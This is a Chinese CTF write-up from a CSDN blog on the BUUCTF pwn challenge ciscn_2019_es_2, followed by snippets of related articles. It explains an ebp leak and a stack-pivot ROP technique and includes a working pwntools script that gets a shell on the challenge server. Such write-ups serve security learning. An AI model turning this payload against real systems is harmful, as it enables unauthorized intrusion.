【BUUCTF】ciscn_2019_es_2

最新推荐文章于 2023-12-11 14:09:05 发布
最新推荐文章于 2023-12-11 14:09:05 发布
阅读量269 收藏 1
点赞数 1
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/111872831
版权

【BUUCTF】ciscn_2019_es_2

看下程序
在这里插入图片描述
在这里插入图片描述
有两处read可以溢出,但只能溢出刚好盖到ebp和ret
由于memset只清了0x20,所以可以泄露出ebp
在这里插入图片描述
有system函数,但参数不对
在这里插入图片描述
思路:运用栈迁移,迁移到我们写入的前面的部分,写rop链,就可以开shell了
由于需要跳转到我们写入的前面的部分需要知道它的地址,地址=ebp地址-偏移。
用gdb-peda调试,断点设在vul函数,一步步跟进,可以输入aaaa
然后searchmem aaaa
stack 来查看栈状态

(这图可能有错,我也不确定)
偏移=0x8c-0x54=0x38

exp:

from pwn import*
r=remote('node3.buuoj.cn',27354)
elf=ELF('./ciscn_2019_es_2')
context.log_level = 'debug'
context.arch = elf.arch
r.send('a'*0x20+'b'*8)
r.recvuntil('bbbbbbbb')
ebp=u32(r.recv(4))
print hex(ebp)
system=p32(elf.sym['system'])
leave_ret=p32(0x080484b8)
pd='a'*4+system+p32(0)+p32(ebp-0x28)+'/bin/sh\0'
pd+='a'*0x10+p32(ebp-0x38)+leave_ret
r.send(pd)
r.interactive()

注:这里system的参数要的是/bin/sh的地址,所以要这样:p32(ebp-0x28)+’/bin/sh\0’
主要参考这位师傅的文章:
https://www.cnblogs.com/remon535/p/13507217.html

Nq0inaen
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnciscn_2019_es_2
Nothing
12-24 2762
例行检查 分析程序,程序存在system函数,但是不能直接得到flag。 vul函数中存在栈溢出,但只能溢出8个字节,只能盖到ebp和ret。vul函数中有两次read和printf第一次可以用来泄露ebp,得到栈地址,然后进行栈迁移。然后利用main函数返回时将控制流转到system。 根据一下汇编代码布置栈数据。 from pwn import * #io=process('ciscn...
赛点资源数据包_嵌入式_2019.zip
06-28
赛点资源数据包_嵌入式_2019.zip是一个针对嵌入式领域的学习资料集合,旨在帮助开发者深入理解和掌握嵌入式系统的关键技术和最新趋势。 首先,我们要理解什么是嵌入式系统。嵌入式系统是嵌入到其他设备或系统中的...
ciscn_2019_es_2【BUUCTF
qq_41696518的博客
09-02 841
与往常溢出不同的是,该溢出仅仅只能溢出8(0x30-0x28)字节的数据,恰好就是覆盖ebp和ret地址数据,并且存在两处溢出漏洞。因此可以用read函数将system(“/bin/sh”)读到当前栈中,并返回让其执行该函数即可。这里有两个问题,1.system(“/bin/sh”)存储地址如何得知 2. 如何返回该system地址执行函数。
ciscn_2019_es_2
小白垃圾笔记2
05-21 657
小白垃圾做题笔记,不及建议阅读。声明,exp来自网络,调试过程自己调试,对于题目的理解仅供参考。由于本人也是小白,且pwn全靠自己摸索,所以有很多理解不到位的地方。如有错误,欢迎指正。
[BUUCTF]PWN——ciscn_2019_es_2
mcmuyanga的博客
10-27 2264
ciscn_2019_es_2 附件 步骤: 例行检查,32位程序,开启了nx保护 32位ida载入,shif+f12查看程序里的字符串,这边的“echo flag” 是个迷惑性的字符串,它只是输出了flag这4个字符,但是程序里有system函数,到时候这个函数可以直接拿来使用 system_addr=0x80048400 main函数 程序主体在vul函数里 读入0x30字节数据给s,s大小是0x28,只能溢出0x8字节,覆盖到ret,没法构造太长的rop,但是这边可以给s写入
ciscn_2019_es_2 栈迁移(很好的例子)
weixin_46521144的博客
07-17 1179
ciscn_2019_es_2 一道很好的栈迁移例题。之前看合天讲的虽然也涉及到原理,但是例子用的是攻防世界pwn200,溢出长度还是有点多。这次只能溢出ebp和retaddr,就很典型并且有挑战性。这题没做出来,看的wp,希望下次能自己做出来。 题目给了两次溢出,这两次都是必要的。一般来说,第一次溢出需要泄露栈上地址用来给第二次做迁移使用,第二次执行栈迁移,控制ret跳转到我们所迁移的栈上,执行栈上填写的exp。由于第二次依然是在函数栈帧内输入,因此除非能自己read到bss上(通常能这样做的溢出空间也
BUUCTFPWNciscn_2019_es_2 栈迁移 栈劫持
m0_55368674的博客
01-16 624
BUUCTFPWNciscn_2019_es_2题解
gl_code.rar_V2 _opengl es_opengl es 2.0
09-24
OpenGL ES 2.0 code for Linux v2.13.6.
2019年欧洲车身会议蔚来ES8_Benchmark数据.pdf
01-21
2019年欧洲车身会议蔚来ES8_Benchmark数据
Elasticsearch 中国开发者调查报告_2019.pdf
12-20
2010年 Elasticsearch 首个...为了深入了解 Elasticsearch 开发者群体的现状,2019 年 11 月,Elastic 技术社区、阿里巴巴 Elasticsearch 技术团队和阿里云开发者社区三方联合发起了 Elasticsearch 开发者调研活动。
Sample6_2.rar_opengl es_opengl es 2.0
09-19
OpenGL ES 2.0 3D eaample
[BUUCTF]-PWN:ciscn_2019_es_2解析(栈迁移)
最新发布
2301_79326813的博客
12-11 1204
答:先说明一点,我们第二次构造payload时往ebp填入ebp-0x38是为了让它在执行完函数原有的leave,ret之后ebp指向b'a'*4的头地址,但要注意这里不是输入ebp-0x28,因为第一个printf打印出来的是ebp里的内容而不是ebp的地址,通过动态调试可以知道ebp里面的内容是ebp+0x10的地址,我们打印出来的就是ebp+10的地址,这里就要填入ebp-0x38才能使ebp指向b'a'*4的头。答:首先要明白32位是通过栈传参的,这样的形式是32位的调用函数的调用规则。
栈迁移(ciscn_2019_es_2)
菊花的老窝
05-03 385
栈迁移顾名思义就是将原来的程序栈迁移到另一个地方,使得我们可以将构造的 ROP 链完整的填入。那么想要修改栈的位置,那么就需要修改寄存器 esp 和 ebp 的值。想要修改 esp 和 ebp 的值,我们需要用到leave和ret两个 gadget。
【CTF】ciscn_2019_es_2
凉水的博客
07-25 1194
ciscn_2019_es_2
BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1006
1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
[PWN] BUUCTF ciscn_2019_es_2
空城惜梦的博客
06-20 1226
[PWN] BUUCTF ciscn_2019_es_2解题分析漏洞利用payload解析程序执行过程图参考: 解题分析 按照惯例checksec一下,开了NX与RELRO 运行程序,查看逻辑,两次input,并且回显Hello,input 32位IDA打开,查看关键函数vul(),发现两次read往s里写内容,read可写0x30个字节,但s的缓冲区只有0x28个字节,所以这里存在着栈溢出,若有backdoor直接获得flag的话,可直接构造 payload=0x28*‘a’+ebp+backdoo
es 删除数据_干货 | 携程Elasticsearch数据同步实践
06-07
您需要关于 Elasticsearch 的数据删除操作的信息吗?如果是的话,可以使用 Elasticsearch 提供的 Delete API 来删除单个或多个文档。例如,您可以使用以下命令删除具有指定 ID 的单个文档: ``` DELETE /my_index/_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值